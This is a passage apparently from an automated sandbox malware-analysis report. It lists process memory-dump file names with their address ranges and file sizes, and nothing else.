                                                                                                                                                                                • memory/2508-1421-0x00000000004A0000-0x000000000078D000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2.9MB

                                                                                                                                                                                • memory/2508-1449-0x00000000004A0000-0x000000000078D000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2.9MB

                                                                                                                                                                                • memory/3240-1927-0x0000000004F00000-0x0000000004F73000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  460KB

                                                                                                                                                                                • memory/3240-2341-0x0000000004F00000-0x0000000004F73000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  460KB

                                                                                                                                                                                • memory/3240-1938-0x0000000004F00000-0x0000000004F73000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  460KB

                                                                                                                                                                                • memory/3240-1926-0x0000000004F00000-0x0000000004F73000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  460KB

                                                                                                                                                                                • memory/3240-1928-0x0000000004F00000-0x0000000004F73000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  460KB

                                                                                                                                                                                • memory/3240-1931-0x0000000004F00000-0x0000000004F73000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  460KB

                                                                                                                                                                                • memory/3240-1929-0x0000000004F00000-0x0000000004F73000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  460KB

                                                                                                                                                                                • memory/3240-1930-0x0000000004F00000-0x0000000004F73000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  460KB

                                                                                                                                                                                • memory/3352-1509-0x0000000002640000-0x0000000002676000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  216KB

                                                                                                                                                                                • memory/3352-1539-0x0000000007270000-0x0000000007313000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  652KB

                                                                                                                                                                                • memory/3352-1510-0x0000000005330000-0x00000000059FA000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.8MB

                                                                                                                                                                                • memory/3352-1518-0x0000000005A00000-0x0000000005A66000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  408KB

                                                                                                                                                                                • memory/3352-1527-0x00000000071D0000-0x0000000007202000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  200KB

                                                                                                                                                                                • memory/3352-1528-0x000000006F920000-0x000000006F96C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  304KB

                                                                                                                                                                                • memory/3352-1517-0x0000000005280000-0x00000000052E6000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  408KB

                                                                                                                                                                                • memory/3352-1511-0x00000000051E0000-0x0000000005202000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  136KB

                                                                                                                                                                                • memory/3352-1523-0x0000000005B70000-0x0000000005EC7000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.3MB

                                                                                                                                                                                • memory/3352-1524-0x0000000006000000-0x000000000601E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  120KB

                                                                                                                                                                                • memory/3352-1538-0x0000000007210000-0x000000000722E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  120KB

                                                                                                                                                                                • memory/3352-1543-0x00000000075F0000-0x0000000007686000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  600KB

                                                                                                                                                                                • memory/3352-1525-0x00000000060B0000-0x00000000060FC000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  304KB

                                                                                                                                                                                • memory/3352-1541-0x0000000007380000-0x000000000739A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  104KB

                                                                                                                                                                                • memory/3352-1540-0x00000000079D0000-0x000000000804A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.5MB

                                                                                                                                                                                • memory/3352-1542-0x0000000007400000-0x000000000740A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/3612-1919-0x0000000005E80000-0x0000000005E81000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3612-1918-0x0000000000EE0000-0x0000000000F5A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  488KB

                                                                                                                                                                                • memory/3612-1921-0x0000000005E80000-0x0000000005E81000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3788-1920-0x0000000000400000-0x0000000000446000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  280KB

                                                                                                                                                                                • memory/3788-1924-0x0000000000400000-0x0000000000446000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  280KB

                                                                                                                                                                                • memory/3788-1922-0x0000000000400000-0x0000000000446000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  280KB

                                                                                                                                                                                • memory/3804-2117-0x0000000000400000-0x000000000046B000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  428KB

                                                                                                                                                                                • memory/3804-1508-0x0000000000100000-0x0000000000797000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.6MB

                                                                                                                                                                                • memory/4088-2271-0x0000000000EB0000-0x0000000000F02000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  328KB

                                                                                                                                                                                • memory/4120-1697-0x0000000000AE0000-0x0000000000AE6000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  24KB

                                                                                                                                                                                • memory/4220-1605-0x0000000000050000-0x0000000000060000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/4404-1243-0x0000000004CA0000-0x0000000004D3C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  624KB

                                                                                                                                                                                • memory/4404-1242-0x0000000000300000-0x0000000000308000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  32KB

                                                                                                                                                                                • memory/4464-1623-0x00000000004F0000-0x0000000000544000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  336KB

                                                                                                                                                                                • memory/4908-1661-0x0000000007970000-0x0000000007982000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  72KB

                                                                                                                                                                                • memory/4908-1663-0x0000000007B40000-0x0000000007B8C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  304KB

                                                                                                                                                                                • memory/4908-1662-0x00000000079D0000-0x0000000007A0C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  240KB

                                                                                                                                                                                • memory/4908-1660-0x0000000007A30000-0x0000000007B3A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.0MB

                                                                                                                                                                                • memory/4908-1625-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  328KB

                                                                                                                                                                                • memory/4908-1656-0x0000000006E10000-0x0000000006E86000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  472KB

                                                                                                                                                                                • memory/4908-1659-0x0000000007E30000-0x0000000008448000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.1MB

                                                                                                                                                                                • memory/4908-1657-0x0000000007460000-0x000000000747E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  120KB

                                                                                                                                                                                • memory/4976-2322-0x000002EDB5100000-0x000002EDB511C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  112KB

                                                                                                                                                                                • memory/4976-2320-0x000002EDB5450000-0x000002EDB5505000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  724KB

                                                                                                                                                                                • memory/5188-2211-0x000000000A250000-0x000000000A260000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/5188-2210-0x000000000A090000-0x000000000A0A0000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/5188-2184-0x0000000000810000-0x0000000000EBE000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.7MB

                                                                                                                                                                                • memory/5188-2200-0x0000000009C30000-0x0000000009C3E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  56KB

                                                                                                                                                                                • memory/5188-2199-0x000000000A030000-0x000000000A068000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  224KB

                                                                                                                                                                                • memory/5188-2203-0x000000000A090000-0x000000000A0A0000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/5188-2206-0x000000000A090000-0x000000000A0A0000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/5188-2204-0x000000000A090000-0x000000000A0A0000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/5188-2205-0x000000000A090000-0x000000000A0A0000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/5188-2208-0x000000000A250000-0x000000000A260000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/5188-2209-0x000000000A090000-0x000000000A0A0000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/5188-2207-0x000000000A250000-0x000000000A260000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/5196-1964-0x0000000000D30000-0x00000000013E0000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.7MB

                                                                                                                                                                                • memory/5196-1997-0x0000000000D30000-0x00000000013E0000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.7MB

                                                                                                                                                                                • memory/5264-2130-0x000001BD6A8A0000-0x000001BD6A8C8000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  160KB

                                                                                                                                                                                • memory/5408-2171-0x0000000000B00000-0x0000000000E24000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.1MB

                                                                                                                                                                                • memory/5408-2225-0x000000001D220000-0x000000001D270000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  320KB

                                                                                                                                                                                • memory/5408-2239-0x000000001D330000-0x000000001D3E2000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  712KB

                                                                                                                                                                                • memory/5428-2323-0x0000000000400000-0x0000000000424000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  144KB

                                                                                                                                                                                • memory/5440-1977-0x0000000000520000-0x0000000000532000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  72KB

                                                                                                                                                                                • memory/5520-2243-0x0000000000800000-0x0000000000884000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  528KB

                                                                                                                                                                                • memory/5532-2309-0x0000000000400000-0x00000000004F2000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  968KB

                                                                                                                                                                                • memory/5532-2091-0x0000000000400000-0x00000000004F2000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  968KB

                                                                                                                                                                                • memory/5696-2330-0x00007FF6CCBC0000-0x00007FF6CD157000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5.6MB

                                                                                                                                                                                • memory/5816-1998-0x0000000000760000-0x000000000078A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  168KB

                                                                                                                                                                                • memory/5816-1999-0x0000000005060000-0x0000000005066000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  24KB

                                                                                                                                                                                • memory/5856-2310-0x0000000000400000-0x00000000006A9000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2.7MB

                                                                                                                                                                                • memory/5920-2256-0x0000000000340000-0x0000000000352000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  72KB

                                                                                                                                                                                • memory/5968-2005-0x0000000000BC0000-0x0000000000BD4000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  80KB

                                                                                                                                                                                • memory/6132-2056-0x000001ED4BAE0000-0x000001ED4BB95000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  724KB

                                                                                                                                                                                • memory/6132-2054-0x000001ED4BAC0000-0x000001ED4BADC000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  112KB

                                                                                                                                                                                • memory/6132-2057-0x000001ED33420000-0x000001ED3342A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB